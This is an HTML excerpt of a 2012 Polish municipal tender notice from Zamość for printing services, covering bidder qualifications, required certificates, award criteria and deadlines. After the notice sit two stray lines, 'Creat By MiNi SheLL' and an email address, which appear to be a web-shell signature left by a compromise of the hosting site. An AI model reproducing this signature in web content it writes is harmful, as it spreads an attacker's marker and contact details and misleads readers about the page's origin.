<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w w/w.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć nastepujące dokumenty;

Wykazu wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego,że te dostawy lub usługi zostały lub są wykonane należycie. 

- warunek zostanie spełniony jeżeli wykonawca przedstawi dokumenty potwierdzające  wykonanie 
2 usług odpowiadających opisowi przedmiotu zamówienia, tj., wykonanie druku po  25 000,00 zł (każda ), brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w w/w.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, korzystania z nich przy wykonywaniu zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć nastepujące dokumenty;

Wykazu wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego,że te dostawy lub usługi zostały lub są wykonane należycie. 

- warunek zostanie spełniony jeżeli wykonawca przedstawi dokumenty potwierdzające  wykonanie 
2 usług odpowiadających opisowi przedmiotu zamówienia, tj., wykonanie druku po  25 000,00 zł (każda ), brutto.

Warunki udziału
1. Sytuacja podmiotowa Wykonawców.
1.1.W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy pzp., Zamawiający żąda przedłożenia wraz z ofertą następujących oświadczeń lub dokumentów:
Załącznik nr 3 - oświadczenie o spełnianiu warunków udziału w postępowaniu.
2. W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych, do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach o których mowa w art. 24 ust. 1 ustawy Zamawiający żąda: 
Załącznik nr 4 - oświadczenie o braku podstaw o wykluczenia
Do formularza nr 4, Wykonawca zobowiązany jest załączyć;
1) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionego niw wcześniej niż 3 miesiące przed upływem terminu składania ofert, załącznik nr 5
2) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub w całości wykonania decyzji właściwego organu - wystawionego nie wcześciej niż 3 miesiące przed upływem terminu składania ofert, załącznik nr 6</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają nakładają obowiązek ich posiadania;

2) posiadania wiedzy i doświadczenia w tym względzie:

3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia; 

4) sytuacji ekonomicznej i finansowej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy - załącznik nr 1.
2. Kosztorys ofertowy - załącznik nr 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ogólne warunki umowy na jakich Zamawiający zamierza zawrzeć umowę z wybranym Wykonawcą zawarte są w projekcje umowy stanowiącym załącznik do niniejszej siwz.
Zamawiający przewiduje wprowadzenie zmian w zawartej umowie w przypadku:

zmiany w projekcie;
zmiany warunków finansowania
zmiany terminów zakończenia całości lub elementu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mbnet.zamosc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zamość, ul. Peowiaków 92, pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2012 godzina 09:00, miejsce: Biurze Obsługi Interesanta, stanowisko nr.1, w terminie do dnia 13.08.2012 r do godziny 09:00, Oferty zostaną otwarte  w świetlicy II piętro w dniu   13.08.2012 godz 09;15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Rozwój Polski Wschodniej  na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com